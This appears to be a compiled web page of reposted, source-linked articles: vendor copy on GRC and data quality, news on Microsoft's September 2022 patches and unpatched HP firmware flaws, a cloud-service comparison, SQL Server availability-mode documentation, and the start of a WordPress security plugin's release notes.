Modern companies recognize data as an essential asset that impacts their bottom line. Furthermore, they understand that poor data quality can damage credibility, reduce sales, and minimize growth.

In today’s world, organizations are aiming to be data-driven. However, becoming a data-driven organization is tough without a GRC program.

How so?

Governance, Risk, and Compliance enable organizations to protect and manage data quality by creating standardized, controlled, and repeatable processes. This is key because every piece of data an organization process has an associated risk.

By understanding these risks, companies can implement the necessary controls and policies for handling and extracting data correctly so that every department can access the same quality information.

Organizations without structured data can’t provide any value, and they face the following risks:

  • Missed opportunities: Many leads are lost because of incomplete or inaccurate data. Also, incorrect data means wrong insights, resulting in missing critical business opportunities.
  • Lost revenue: According to 2021 Gartner’s research, the average financial impact of poor data quality on organizations is $12.9 million annually.
  • Poor customer experience: When data quality is poor, organizations can’t identify customers’ pain points and preferences. As a result, the offer of products or services doesn’t match customers’ needs and expectations.
  • Lack of compliance: In some industries where regulations control relationships or customer transactions, maintaining good-quality data can be the difference between compliance and fines of millions of dollars. GRC is vital to keep compliance in the loop as new regulations evolve worldwide.
  • Increased expenses: A few years ago, IBM’s research showed that businesses lost 3.1 trillion dollars in the US alone. How? Spending time to find the correct data, fixing errors, and just hunting for information and confirmed sources.
  • Misanalysis: Around 84% of CEOs are concerned about the quality of data they are deciding on. Wrong data will lead to bad decisions and ultimately damage operations, finances, HR, and every area within the company.
  • Reputational damage: In today’s world, customers spend a lot of their time reading reviews before making a decision. For instance, if a company fails to satisfy its customers, everyone will know.
  • Reduced efficiency: Poor data quality forces employees to do manual data quality checks, losing time and money.

To sum up:

Having the right processes to manipulate data will prevent organizations from missing business opportunities, damaging their reputation, and doing unnecessary repetitive tasks.

How GRC supports data-driven business and what are the key benefits of clean data

Data-driven businesses embrace the use of data (and its analysis) to get insights that can improve the organization. The efficient management of big data through GRC tools helps identify new business opportunities, strengthen customer experiences, grow sales, improve operations, and more.

For example, GRC helps data-driven businesses by allowing them to create and manage the right policies to process and protect the company’s data.

More importantly, organizations can also control individual policies to ensure they have been distributed and acknowledged accordingly.

In terms of benefits, although clean data has numerous “easy-to-identify” benefits, many others are not easily identified. Trusting data not just improves efficiency and results; it also helps with fundamental, vital factors that affect business performance and success.

What are these factors?

Fundamental benefits:

  • Profits/Revenue
  • Internal communication
  • Employees confidence to share information
  • Company’s reputation
  • Trust

Operational benefits:

  • Efficiency
  • Business outcome
  • Privacy issues
  • Customer satisfaction
  • Better audience-targeting

How GRC protect the value of businesses and their data

In this contemporary world, companies should be measured not only via existing financial measurements but also by the amount of monetizable data they can capture, consume, store and use. More importantly, how the data helps the organization’s internal processes to be faster and more agile.

When people think of high-quality data and big data, they usually associate these two with big organizations, especially technology and social media platforms. However, big quality data gives organizations of any size plenty of benefits.

Data quality and integrity help organizations to:

  • Understand their clients
  • Enhance business operations
  • Understand industry best practices
  • Identify the best partnership options
  • Strengthen business culture
  • Deliver better results
  • Make more money

Using the right GRC platform helps companies create and control the policies and practices to ensure their data is valid, consistent, accurate, and complete — allowing them to get all these benefits.

The key to using GRC tools is that businesses can produce what customers expect on a greater scale and with higher precision and velocity.

Now, what does this have to do with value?

By protecting the value of data, organizations are protecting their overall worth. Indeed, GRC empowers companies to create a culture of value, giving everyone education and agency so they can make better decisions.

Also, GRC helps companies tell better security stories. These stories aim to build trust with customers and partners, enter new markets, and shorten sale cycles.

To summarize:

A better understanding of customers and processes — through data — will lead to better products and services, enhanced experiences, and long-lasting relationships with customers. All these represent growth and more revenue for companies.

What happens when a company’s data is not safe? Can it damage their value?

Trust is a vital component of any interaction (business or personal) and, as such, is mandatory for organizations to protect it — without trust, there is no business.

When data is not protected, the chances of breaches are higher, causing direct and indirect costs.

Direct costs are:

  • Fines
  • Lawsuits
  • Stolen information
  • Compensations
  • Potential business loss

Indirect costs are:

  • Reputation/Trust
  • PR activities
  • Lost revenue from downtime
  • New and better protection

Often, reputation damages can cause long-term harm to organizations, making it hard for them to acquire and maintain business. In fact, reputation loss is the company’s biggest worry, followed by financial costs, system damage, and downtime.

So, what does all this mean?

It’s not just about collecting data; it is also about how companies reduce risks and leverage and protect the data they have. GRC integrates data security, helping organizations be better prepared against unauthorized access, corruption, or theft.

Moreover, GRC tools can help elevate data security by controlling policies, regulations, and predictable issues within the organization.

The bottom line?

When companies can’t get or maintain customers because of a lack of trust, the organization’s value will be significantly lower — or even zero. Unfortunately, this is even more true for small and medium size companies.

How to use GRC to achieve and maintain high-quality data?

Many organizations have trouble managing their data, which, unfortunately, leads to poor decisions and a lack of trust from employees and customers.

Moreover, although companies know how costly wrong information is, many are not working on ensuring quality data through the right processes and controls. In fact, Harward Business Review said that 47% of newly created data records have at least one critical error.

Why is that?

Because there is a lack of focus on the right processes and systems that need to be in place to ensure quality data.

What do poor processes cause?

  • Human errors
  • Wrong data handling
  • Inaccurate formatting
  • Different sets of data for various departments
  • Unawareness of risks
  • Incorrect data input or extraction

Fortunately, GRC’s primary goal is to develop the right policies and procedures to ensure everyone in the organization appropriately manages the data.

GRC aims to create a data structure based on the proper governance that will dictate how people organize and handle the company’s information. As a result, GRC will empower companies to be able to extract value from their data.

That is not everything.

Governance, Risk, and Compliance allow organizations to understand the risks associated with data handling and guide managers to create and distribute the policies that will support any data-related activity.

The following are some of the ways GRC is used to achieve and maintain high-quality data:

  • Data governance: Data governance is more than setting rules and telling people what to do. Instead, it is a collection of processes, roles, policies, standards, and metrics that will lead to a cultural change to ensure effective management of information throughout the organization.
  • Education: Achieving good data quality is not easy. It requires a deep understanding of data quality principles, processes, and technologies. GRC facilitates the education process by allowing the organization to seamlessly implement, share, and communicate its policies and standards to every department.
  • Everyone is involved: Everyone must understand the organization’s goal for data quality and the different processes and approaches that will be implemented. GRC focuses on cultural change.
  • Be aware of threats: When managing data, each process has risks associated with it. The mission of GRC is for the organization to recognize and deal with potential threats effectively. When companies are aware of risks, they can implement the necessary controls and rules to protect the data.
  • One single source of truth: A single source of truth ensures everyone in the organization makes decisions based on the same consistent and accurate data. GRC can help by defining the governance over data usage and manipulation. Furthermore, GRC makes it easy to communicate policies, see who the policy creator is, and ensure employees are acting according to the standards.

Get a free consultation with StandardFusion to learn more about how GRC and data governance can boost your organization’s value.

Source :
https://thehackernews.com/2022/09/how-grc-protects-value-of-organizations.html

Microsoft’s Latest Security Update Fixes 64 New Flaws, Including a Zero-Day

Tech giant Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks.

Of the 64 bugs, five are rated Critical, 57 are rated Important, one is rated Moderate, and one is rated Low in severity. The patches are in addition to 16 vulnerabilities that Microsoft addressed in its Chromium-based Edge browser earlier this month.

“In terms of CVEs released, this Patch Tuesday may appear on the lighter side in comparison to other months,” Bharat Jogi, director of vulnerability and threat research at Qualys, said in a statement shared with The Hacker News.

“However, this month hit a sizable milestone for the calendar year, with MSFT having fixed the 1000th CVE of 2022 – likely on track to surpass 2021 which patched 1,200 CVEs in total.”

CyberSecurity

The actively exploited vulnerability in question is CVE-2022-37969 (CVSS score: 7.8), a privilege escalation flaw affecting the Windows Common Log File System (CLFS) Driver, which could be leveraged by an adversary to gain SYSTEM privileges on an already compromised asset.

“An attacker must already have access and the ability to run code on the target system. This technique does not allow for remote code execution in cases where the attacker does not already have that ability on the target system,” Microsoft said in an advisory.

The tech giant credited four different sets of researchers from CrowdStrike, DBAPPSecurity, Mandiant, and Zscaler for reporting the flaw, which may be an indication of widespread exploitation in the wild, Greg Wiseman, product manager at Rapid7, said in a statement.

CVE-2022-37969 is also the second actively exploited zero-day flaw in the CLFS component after CVE-2022-24521 (CVSS score: 7.8), the latter of which was resolved by Microsoft as part of its April 2022 Patch Tuesday updates.

It’s not immediately clear if CVE-2022-37969 is a patch bypass for CVE-2022-24521. Other critical flaws of note are as follows –

  • CVE-2022-34718 (CVSS score: 9.8) – Windows TCP/IP Remote Code Execution Vulnerability
  • CVE-2022-34721 (CVSS score: 9.8) – Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
  • CVE-2022-34722 (CVSS score: 9.8) – Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
  • CVE-2022-34700 (CVSS score: 8.8) – Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability
  • CVE-2022-35805 (CVSS score: 8.8) – Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability

“An unauthenticated attacker could send a specially crafted IP packet to a target machine that is running Windows and has IPSec enabled, which could enable a remote code execution exploitation,” Microsoft said about CVE-2022-34721 and CVE-2022-34722.

Also resolved by Microsoft are 15 remote code execution flaws in Microsoft ODBC Driver, Microsoft OLE DB Provider for SQL Server, and Microsoft SharePoint Server and five privilege escalation bugs spanning Windows Kerberos and Windows Kernel.

The September release is further notable for patching yet another elevation of privilege vulnerability in the Print Spooler module (CVE-2022-38005, CVSS score: 7.8) that could be abused to obtain SYSTEM-level permissions.

CyberSecurity

Lastly, included in the raft of security updates is a fix released by chipmaker Arm for a speculative execution vulnerability called Branch History Injection or Spectre-BHB (CVE-2022-23960) that came to light earlier this March.

“This class of vulnerabilities poses a large headache to the organizations attempting mitigation, as they often require updates to the operating systems, firmware and in some cases, a recompilation of applications and hardening,” Jogi said. “If an attacker successfully exploits this type of vulnerability, they could gain access to sensitive information.”

Software Patches from Other Vendors

Aside from Microsoft, security updates have also been released by other vendors since the start of the month to rectify dozens of vulnerabilities, including —

High-Severity Firmware Security Flaws Left Unpatched in HP Enterprise Devices

A number of firmware security flaws uncovered in HP’s business-oriented high-end notebooks continue to be left unpatched in some devices even months after public disclosure.

Binarly, which first revealed details of the issues at the Black Hat USA conference in mid-August 2022, said the vulnerabilities “can’t be detected by firmware integrity monitoring systems due to limitations of the Trusted Platform Module (TPM) measurement.”

Firmware flaws can have serious implications as they can be abused by an adversary to achieve long-term persistence on a device in a manner that can survive reboots and evade traditional operating system-level security protections.

CyberSecurity

The high-severity weaknesses identified by Binarly affect HP EliteBook devices and concern a case of memory corruption in the System Management Mode (SMM) of the firmware, thereby enabling the execution of arbitrary code with the highest privileges –

  • CVE-2022-23930 (CVSS score: 8.2) – Stack-based buffer overflow
  • CVE-2022-31640 (CVSS score: 7.5) – Improper input validation
  • CVE-2022-31641 (CVSS score: 7.5) – Improper input validation
  • CVE-2022-31644 (CVSS score: 7.5) – Out-of-bounds write
  • CVE-2022-31645 (CVSS score: 8.2) – Out-of-bounds write
  • CVE-2022-31646 (CVSS score: 8.2) – Out-of-bounds write

Three of the bugs (CVE-2022-23930, CVE-2022-31640, and CVE-2022-31641) were notified to HP in July 2021, with the remaining three vulnerabilities (CVE-2022-31644, CVE-2022-31645, and CVE-2022-31646) reported in April 2022.

It’s worth noting that CVE-2022-23930 is also one of the 16 security flaws that were previously flagged this February as impacting several enterprise models from HP.

SMM, also called “Ring -2,” is a special-purpose mode used by the firmware (i.e., UEFI) for handling system-wide functions such as power management, hardware interrupts, or other proprietary original equipment manufacturer (OEM) designed code.

Shortcomings identified in the SMM component can, therefore, act as a lucrative attack vector for threat actors to perform nefarious activities with higher privileges than that of the operating system.

CyberSecurity

Although HP has released mitigations to address the flaws in March and August, the vendor has yet to push the patches for all impacted models, potentially exposing customers to the risk of cyberattacks.

“In many cases, firmware is a single point of failure between all the layers of the supply chain and the endpoint customer device,” Binarly said, adding, “fixing vulnerabilities for a single vendor is not enough.”

“As a result of the complexity of the firmware supply chain, there are gaps that are difficult to close on the manufacturing end since it involves issues beyond the control of the device vendors.”

The disclosure also arrives as the PC maker last week rolled out fixes for a privilege escalation flaw (CVE-2022-38395, CVSS score: 8.2) in its Support Assistant troubleshooting software.

“It is possible for an attacker to exploit the DLL hijacking vulnerability and elevate privileges when Fusion launches the HP Performance Tune-up,” the company noted in an advisory.

Source :
https://thehackernews.com/2022/09/high-severity-firmware-security-flaws.html

SaaS vs PaaS vs IaaS: What’s the Difference & How to Choose

Companies are increasingly using Cloud services to support their business processes. But which types of Cloud services are there, and what is the difference? Which kind of Cloud service is most suitable for you? Do you want to be unburdened or completely in control? Do you opt for maximum cost savings, or do you want the entire arsenal of possibilities and top performance? Can you still see the forest for the trees? In this article and in the next, I describe several different Cloud services, what the differences and features are and what exactly you need to pay attention to.

Let’s start with the definition of Cloud computing. This is the provision of services using the internet (Cloud). Think of storage, software, servers, databases etc. Depending on the type of service and the service that is offered (think of license management or data storage), you can divide these services into categories. Examples are IaaS (Infrastructure as a Service), PaaS (Platform as a Service), SaaS (Software as a Service), etc. These services are provided by a cloud provider. Whether this is Microsoft (Azure), Amazon (AWS), or another vendor (Google, Alibaba, Oracle, etc.), each vendor offers Cloud services that fall under one of the categories of Cloud services that we are about to discuss.

One feature of Cloud computing is that you pay according to the usage and the service you purchase. For example, for SaaS, you pay for the software’s license and support. This also means that if you buy a SaaS service (e.g., Office 365) and don’t use it, you will still be charged. At the same time, if you purchase storage with IaaS, for example, you only pay for the amount of storage you use, possibly supplemented with additional services such as backup, etc.

Sometimes Cloud services complement each other; think, for example, of DaaS (Database as a Service), where a database is offered via the Cloud. Often you need an application server and other infrastructure to read data from this database. These usually run in a Landing Zone, purchased from an IaaS service. But some services can also be standalone, for example, SaaS (Office 365).

Each Cloud service has specific characteristics. Sometimes it requires little or no (technical) knowledge, but it can also be challenging to manage and use the services according to best practices. This often depends on the degree to which you want to see yourself in control. If you want an application from the Cloud where you are completely relieved of all worries, this requires little technical knowledge from the user or the administrator. But if you want maximum control, then IaaS gives you an enormous range of possibilities. In this article, you can read what you need to consider.

It is advisable to think beforehand about what your requirements and wishes are precisely and whether this fits in with the service you want to purchase. If you wish to use an application in the Cloud but use many custom settings, this is often not possible. If you don’t want to be responsible for updating and backing up an application and use little or no customization, a SaaS can be very interesting. Also, look at how a service fits into your business process. Does it offer possibilities for automation, reporting, or disaster recovery? Are there possibilities to temporarily allocate extra resources in case of peak demand (horizontal or vertical scaling up), and what guarantees does the supplier offer with this service? Think of RPO / RTO and accessibility of the service desk in case of a calamity.

Let’s get started quickly!

IaaS (Infrastructure as a Service)

One of the best-known Cloud services is undoubtedly IaaS. For many companies, this is often their first introduction to a Cloud service. You rent the infrastructure from a cloud provider. For example, the network infrastructure, virtual servers (including operations system), and storage. A feature of IaaS is that you have complete control – Both on the management side and how you can deploy resources (requests). This can be done in various automated ways (Powershell, IaC, DevOps pipelines, etc.) and via the classic management interface that all providers offer. Things that are often not possible with a PaaS service are possible with an IaaS service. You have complete control. In principle, you can set up a complete server environment (all services are available for this), but you do have the benefits of the Cloud, such as scalability and pay per use or per resource.

IaaS therefore, most resembles an on-premise implementation. You often see this used in combination with the use of virtual servers. Critical here is a good investigation into the possible limitations, for example, I/O, so that the performance can be different in practice than in a traditional local environment. You are responsible for arranging security and backup. The advantage is that you have an influence on the choice of technology used. You can customize the setup according to your needs and wishes. You can standardize the configuration to your organization. Deployment can be complex, and you are forced to make your own choices, so some expertise is needed.

PaaS (Platform as a Service)

PaaS stands for Platform as a service and goes further than IaaS. You get a platform where you can do the configuration yourself. When you use a PaaS service, the vendor takes care of the sub-layer (IaaS) and the operating system and middleware. So you sacrifice something in terms of control and capabilities. PaaS services are ideal for developers, web and application builders. After all, you can quickly make an environment available. Using it means you no longer have to worry about the infrastructure, operating system, and middleware. This is taken care of by the supplier based on best practices. This also offers security advantages, as you do not have to think about patching and upgrading these things that are now done by the vendor.

Another advantage is that you can entirely focus on what you want to do and not on managing the environment. You can also easily purchase additional services and quickly scale them up or down. When you are finished, you can remove and stop the resources, so you have no more costs.

However, do take into account the use of existing software. Not all existing software is suitable to function in a PaaS environment; for example, in a PaaS environment, you do not have full access (after all, the vendor is responsible). Also, not all CPU power and memory are allocated to the Cloud application. This is because it is often hosted on a shared platform, so other applications (and databases) may use the same resources. As for the database, you have the same advantages and disadvantages as with DBaaS.

SaaS (Software as a Service)

This is probably a service you’ve been using for a while. In short, you take applications through the Cloud on a subscription basis. The provider is responsible for managing the infrastructure, patches, and updates. A SaaS solution is ready for use immediately, and you directly benefit from the added value, such as fast scaling up and down and paying per use. Examples are Office365, Sharepoint online, SalesForce, Exact Online, Dropbox, etc.

Unlike IaaS and PaaS, where there is still a lot of freedom, and you have to set everything up yourself, with SaaS however, it is immediately clear what you are buying and what you will get. With this service, you are relieved of most of your worries. The vendor is responsible for all updates, patches, development, and more. You cannot make any updates or changes to the software with this service.

Many companies use one or more SaaS services often even within companies, there is a distinction. For example, each department within a company has its specific applications and associated SaaS services. With this service, you only pay for what you need, including the licenses. These licenses can easily be scaled up or down.

It is interesting for many companies to work with SAAS solutions. It is particularly interesting for start-ups, small companies and freelancers because you only purchase what you use, you don’t have unnecessarily high start-up costs, and you don’t have to worry about the maintenance of the software.

But SAAS can also be a perfect solution for larger companies. For example, if you hire extra staff for specific periods, you can quickly get these people working with the software they need. You buy several additional licenses, and you can stop this when the temporary staff leaves.

How can Vembu help you?

BDRSuite, is a comprehensive Backup & DR solution designed to protect your business-critical data across Virtual (VMware, Hyper-V), Physical Servers (Windows, Linux), SaaS (Microsoft 365, Google Workspace), AWS EC2 Instances, Endpoints (Windows, Mac) and Applications & Databases (MS Active Directory, MS Exchange, MS Outlook, SharePoint, MS SQL, MySQL).

To protect your workloads running on SaaS (Microsoft 365Google Workspace), try out a full-featured 30-days Free Trial of the latest version of BDRSuite.

Source :
https://www.vembu.com/blog/saas-vs-paas-vs-iaas-whats-the-difference-how-to-choose/

Differences between availability modes for an Always On availability group

Applies to:  SQL Server (all supported versions)

In Always On availability groups, the availability mode is a replica property that determines whether a given availability replica can run in synchronous-commit mode. For each availability replica, the availability mode must be configured for either synchronous-commit mode, asynchronous-commit, or configuration only mode. If the primary replica is configured for asynchronous-commit mode, it does not wait for any secondary replica to write incoming transaction log records to disk (to harden the log). If a given secondary replica is configured for asynchronous-commit mode, the primary replica does not wait for that secondary replica to harden the log. If both the primary replica and a given secondary replica are both configured for synchronous-commit mode, the primary replica waits for the secondary replica to confirm that it has hardened the log (unless the secondary replica fails to ping the primary replica within the primary’s session-timeout period).

 Note

If primary’s session-timeout period is exceeded by a secondary replica, the primary replica temporarily shifts into asynchronous-commit mode for that secondary replica. When the secondary replica reconnects with the primary replica, they resume synchronous-commit mode.

Supported Availability Modes

Always On availability groups supports three availability modes-asynchronous-commit mode, synchronous-commit mode, and configuration only mode as follows:

  • Asynchronous-commit mode is a disaster-recovery solution that works well when the availability replicas are distributed over considerable distances. If every secondary replica is running under asynchronous-commit mode, the primary replica does not wait for any of the secondary replicas to harden the log. Rather, immediately after writing the log record to the local log file, the primary replica sends the transaction confirmation to the client. The primary replica runs with minimum transaction latency in relation to a secondary replica that is configured for asynchronous-commit mode. If the current primary is configured for asynchronous commit availability mode, it will commit transactions asynchronously for all secondary replicas regardless of their individual availability mode settings.For more information, see Asynchronous-Commit Availability Mode, later in this topic.
  • Synchronous-commit mode emphasizes high availability over performance, at the cost of increased transaction latency. Under synchronous-commit mode, transactions wait to send the transaction confirmation to the client until the secondary replica has hardened the log to disk. When data synchronization begins on a secondary database, the secondary replica begins applying incoming log records from the corresponding primary database. As soon as every log record has been hardened, the secondary database enters the SYNCHRONIZED state. Thereafter, every new transaction is hardened by the secondary replica before the log record is written to the local log file. When all the secondary databases of a given secondary replica are synchronized, synchronous-commit mode supports manual failover and, optionally, automatic failover.For more information, see Synchronous-Commit Availability Mode, later in this topic.
  • Configuration only mode applies to availability groups that are not on a Windows Server Failover Cluster. A replica in configuration only mode does not contain user data. In configuration only mode, the replica master database stores availability group configuration metadata. For more information see Availability group with configuration only replica.

The following illustration shows an availability group with five availability replicas. The primary replica and one secondary replica are configured for synchronous-commit mode with automatic failover. Another secondary replica is configured for synchronous-commit mode with only planned manual failover, and two secondary replicas are configured for asynchronous-commit mode, which supports only forced manual failover (typically called forced failover).

Availability and failover modes of replicas

The synchronization and failover behavior between two availability replicas depends on the availability mode of both replicas. For example, for synchronous commit to occur, both the current primary replica and the secondary replica in question must be configured for synchronous commit. Likewise, for automatic failover to occur, both replicas need to be configured for automatic failover. Therefore, the behavior for the illustrated deployment scenario above can be summarized in the following table, which explores the behavior with each potential primary replica:

Current Primary ReplicaAutomatic Failover TargetsSynchronous-Commit Mode Behavior WithAsynchronous-Commit Mode Behavior WithAutomatic failover possible
010202 and 0304Yes
020101 and 0304Yes
0301 and 0204No
0401, 02, and 03No

Typically, Node 04 as an asynchronous-commit replica, is deployed in a disaster recovery site. The fact that Nodes 01, 02, and 03 remain at asynchronous-commit mode after failing over to Node 04 helps prevent potential performance degradation in your availability group due to high network latency between the two sites.

Asynchronous-Commit Availability Mode

Under asynchronous-commit mode, the secondary replica never becomes synchronized with the primary replica. Though a given secondary database might catch up to the corresponding primary database, any secondary database could lag behind at any point. Asynchronous-commit mode can be useful in a disaster-recovery scenario in which the primary replica and the secondary replica are separated by a significant distance and where you do not want small errors to impact the primary replica or in situations where performance is more important than synchronized data protection. Furthermore, since the primary replica does not wait for acknowledgements from the secondary replica, problems on the secondary replica never impact the primary replica.

An asynchronous-commit secondary replica attempts to keep up with the log records received from the primary replica. But asynchronous-commit secondary databases always remain unsynchronized and are likely to lag somewhat behind the corresponding primary databases. Typically the gap between an asynchronous-commit secondary database and the corresponding primary database is small. But the gap can become substantial if the server hosting the secondary replica is over loaded or the network is slow.

The only form of failover supported by asynchronous-commit mode is forced failover (with possible data loss). Forcing failover is a last resort intended only for situations in which the current primary replica will remain unavailable for an extended period and immediate availability of primary databases is more critical than the risk of possible data loss.The failover target must be a replica whose role is in the SECONDARY or RESOLVING state. The failover target transitions to the primary role, and its copies of the databases become the primary database. Any remaining secondary databases, along with the former primary databases, once they become available, are suspended until you manually resume them individually. Under asynchronous-commit mode, any transaction logs that the original primary replica had not yet sent to the former secondary replica are lost. This means that some or all of the new primary databases might be lacking recently committed transactions. For more information on how forced failover works and on best practices for using it, see Failover and Failover Modes (Always On Availability Groups).

Synchronous-Commit Availability Mode

Under synchronous-commit availability mode (synchronous-commit mode), after being joined to an availability group, a secondary database catches up to the corresponding primary database and enters the SYNCHRONIZED state. The secondary database remains SYNCHRONIZED as long as data synchronization continues. This guarantees that every transaction that is committed on a given primary database has also been committed on the corresponding secondary database. When every secondary database on a given secondary replica is synchronized, the synchronization-health state of the secondary replica as a whole is HEALTHY.

In This Section:

Factors That Disrupt Data Synchronization

Once all of its databases are synchronized, a secondary replica enters the HEALTHY state. The synchronized secondary replica will remain healthy unless one of the following occurs:

  • A network or computer delay or glitch causes the session between the secondary replica and primary replica to timeout. NoteFor information about the session-time property of availability replicas, see Overview of Always On Availability Groups (SQL Server).
  • You suspend a secondary database on the secondary replica. The secondary replica ceases to be synchronized, and its synchronization-health state is marked as NOT_HEALTHY. The secondary replica cannot become healthy again until the suspended secondary database is either resumed and resynchronized or removed from the availability group.
  • You add a primary database the availability group. Previously synchronized secondary replicas enter the NOT_HEALTHY synchronization-health state. This state indicates that at least one database is in the NOT SYNCHRONIZING synchronization state. A given secondary replica cannot be HEALTHY again until a corresponding secondary database has been prepared on the replica, has been joined to the availability group, and has become synchronized with the new primary database.
  • You change the primary replica or the secondary replica to asynchronous-commit availability mode. After changing to asynchronous-commit mode, the secondary replica will remain in the HEALTHY synchronization-health state as long as data synchronization continues. However, if only the primary replica is changed to asynchronous-commit mode, the synchronous-commit secondary replica will enter the PARTIALLY_HEALTHY synchronization-health state. This state indicates that at least one database is in the SYNCHRONIZING synchronization state, but none of the databases are in the NOT SYNCHRONIZING state.
  • You change any secondary replica to synchronous-commit availability mode. This causes that secondary replica to be marked as in the PARTIALLY_HEALTHY synchronization-health state until all of its databases are in the SYNCHRONIZED synchronization state.

 Tip

To view the synchronization health of an availability group, availability replica, or availability database, query the synchronization_health or synchronization_health_desc column of sys.dm_hadr_availability_group_statessys.dm_hadr_availability_replica_states, or sys.dm_hadr_database_replica_states, respectively.

How Synchronization Works on a Secondary Replica

Under the synchronous-commit mode, after a secondary replica joins the availability group and establishes a session with the primary replica, the secondary replica writes incoming log records to disk (hardens the log) and sends a confirmation message to the primary replica. Once the hardened log on the secondary database has caught up the end of log on the primary database, the state of the secondary database is set to SYNCHRONIZED. The time required for synchronization depends essentially on how far the secondary database was behind the primary database at the start of the session (measured by the number of log records initially received from the primary replica), the work load on the primary database, and the speed of the computer of the server instance that hosts the secondary replica.

Synchronous operation is maintained in the following manner:

  1. On receiving a transaction from a client, the primary replica writes the log for the transaction to the transaction log and concurrently sends the log record to the secondary replicas.
  2. Once a log record is written to the transaction log of the primary database, the transaction can be undone only if there is a failover at this point to a secondary that did not receive the log. The primary replica waits for confirmation from the synchronous-commit secondary replica.
  3. The secondary replica hardens the log and returns an acknowledgement to the primary replica.
  4. On receiving the confirmation from the secondary replica, the primary replica finishes the commit processing and sends a confirmation message to the client. NoteIf a synchronous-commit secondary replica times out without confirming that it has hardened the log, the primary marks that secondary replica as failed. The connected state of the secondary replica changes to DISCONNECTED, and the primary replica stops waiting for confirmation from the secondary replica. This behavior ensures that a failed synchronous-commit secondary replica does not prevent hardening of the transaction log on the primary replica.

Synchronous-commit mode protects your data by requiring the data to be synchronized between two places, at the cost of somewhat increasing the latency of the transaction.

Synchronous-Commit Mode with Only Manual Failover

When these replicas are connected and the database is synchronized, manual failover is supported. If the secondary replica goes down, the primary replica is unaffected. The primary replica runs exposed if no SYNCHRONIZED replicas exist (that is, without sending data to any secondary replica). If the primary replica is lost, the secondary replicas enter the RESOLVING state, but the database owner can force a failover to the secondary replica (with possible data loss). For more information, see Failover and Failover Modes (Always On Availability Groups).

Synchronous-Commit Mode with Automatic Failover

Automatic failover provides high availability by ensuring that the database is quickly made available again after the loss of the primary replica. To configure an availability group for automatic failover, you need to set both the current primary replica and at least one secondary replica to synchronous-commit mode with automatic failover. You can have up to three automatic failover replicas.

Furthermore, for an automatic failover to be possible at a given time, this secondary replica must be synchronized with the primary replica (that is, the secondary databases are all synchronized), and the Windows Server Failover Clustering (WSFC) cluster must have quorum. If the primary replica becomes unavailable under these conditions, automatic failover occurs. The secondary replica switches to the role of primary, and it offers its database as the primary database. For more information, see the “Automatic Failover ” section of the Failover and Failover Modes (Always On Availability Groups) topic.

 Note

For information about WSFC quorum and Always On availability groups, see For more information, see WSFC Quorum Modes and Voting Configuration (SQL Server).

Data latency on secondary replica

Implementing read-only access to secondary replicas is useful if your read-only workloads can tolerate some data latency. In situations where data latency is unacceptable, consider running read-only workloads against the primary replica.

The primary replica sends log records of changes on primary database to the secondary replicas. On each secondary database, a dedicated redo thread applies the log records. On a read-access secondary database, a given data change does not appear in query results until the log record that contains the change has been applied to the secondary database and the transaction has been committed on primary database.

This means that there is some latency, usually only a matter of seconds, between the primary and secondary replicas. In unusual cases, however, for example if network issues reduce throughput, latency can become significant. Latency increases when I/O bottlenecks occur and when data movement is suspended. To monitor suspended data movement, you can use the Always On Dashboard or the sys.dm_hadr_database_replica_states dynamic management view.

For more information on investigating redo latency on the secondary replica, please see Troubleshoot primary changes not reflected on secondary replica.

Related Tasks

To change the availability mode and failover mode

To adjust quorum votes

To perform a manual failover

To view availability group, availability replica, and database states

Related Content

See Also

Overview of Always On Availability Groups (SQL Server)
Failover and Failover Modes (Always On Availability Groups)
Windows Server Failover Clustering (WSFC) with SQL Server

Source :
https://docs.microsoft.com/en-us/sql/database-engine/availability-groups/windows/availability-modes-always-on-availability-groups?view=sql-server-ver16

WP Shield Security PRO – Release 16.1

It’s been a few months in the making, but it’s finally here – our most exciting release (yet again!) of Shield Security for WordPress.

This release is absolutely packed with goodies and our headline feature – integration with CrowdSec – deserves an article all to itself.

Here you’ll discover all the exciting things we’ve packed into ShieldPRO v16 and why you should be upgrading as soon as it’s out.

Let’s dig into all the new goodies…

#1 Partnership with CrowdSec for Crowd-Sourced IP Intelligence

This is, to our mind, one of the most exciting developments for WordPress security for a very long time.

We’ve wanted to achieve this level of protection against bots for years, as we firmly believe that good WordPress security starts with intelligent blocking malicious IP addresses.

Shield does an effective job of this already with its automatic block list system, but we’ve now achieved group intelligence so all WordPress sites running on Shield will benefit from the experiences of all the other websites running Shield.

This is a big topic so we’ve dedicated a whole article to it – learn about the new partnership here.

#2 Brand New IP Rules and Blocking Engine

IP Blocking has been a part of ShieldPRO, practically from the outset. It’s core to our WordPress security philosophy.

With such a long-standing feature, you can imagine that the knowledge and experience used to create that original system isn’t as thorough as it is today. We’ve come a long way, I can promise you.

This release, spurred on by the new CrowdSec integration, sees the much-needed overhaul of our IP management system. It’s smarter and more versatile, and altogether much faster!

Shield must lookup a visitor’s IP address on every single request to a WordPress site. If we can improve the speed of that lookup, we improve Shield performance overall.

#3 Improved UI

Shield has a number of different subsystems, many of which are related. The scan results page is linked to the scanner configuration page, for example.

To-date when you wanted to view any section of the plugin, it would reload the entire page. We’ve done some work to reduce full page reloads so that you can stay “where you are” while viewing the contents of another page.

In particular we’re referring to “Configuration” pages. Links to such areas will now open in an overlay, letting you keep your current page active while you review and adjust settings.

Another UI enhancement is a new title bar across every page of the plugin, letting you see more clearly where you are, along with important links to help resources.

This title bar also includes our brand new “super search box”…

#4 Shield’s Super Search Box

We mentioned UI improvements already, but this deserves a section all to itself.

To say Shield is a large plugin is understating it. There are many options pages, as well tools, tables, data, and charts etc.

Finding your way around can be a bit tricky. Since we built it, we know it inside out. But for everyone that uses it as a tool to protect their sites, it’s not always obvious where to go to find the “thing” you need.

No longer!

With Shield’s “Super Search Box”, you can find almost anything you need, and jump directly to it. Currently you can search for:

  • Specific configuration options
  • Tools such as Import/Export, Admin Notes, Debug
  • Logs such as Activity Logs and Traffic Logs
  • IP Rules
  • IP addresses – it’ll open a popup to review the data Shield holds on any particular IP
  • External links such as Shield’s homepage, Facebook page, helpdesk, crowdsec etc.

We’ll develop this a bit more over time as we get feedback from you on what you’d like to see in there.

#5 Lighter, Faster Scan Results Display

